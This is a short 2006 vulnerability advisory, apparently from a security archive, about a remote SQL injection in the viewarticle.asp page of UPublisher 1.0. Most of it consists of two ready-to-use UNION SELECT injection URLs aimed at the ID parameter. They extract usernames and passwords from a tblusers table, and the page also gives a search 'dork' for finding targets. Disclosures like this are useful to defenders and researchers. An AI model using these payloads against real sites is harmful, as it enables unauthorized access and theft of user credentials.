Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15037
HistoryNov 14, 2006 - 12:00 a.m.

UPublisher 1.0 (viewarticle.asp) Remote SQL Injection Vulnerability

2006-11-1400:00:00
vulners.com
69

Title : UPublisher 1.0 (viewarticle.asp) Remote SQL Injection Vulnerability

Author : ajann

Dork : UPublisher


###http://[target]/[path]//viewarticle.asp?ID=[SQL]

Example:

//viewarticle.asp?ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers
OR —
//viewarticle.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0%20from%20tblusers

"""""""""""""""""""""

ajann,Turkey

Im not Hacker!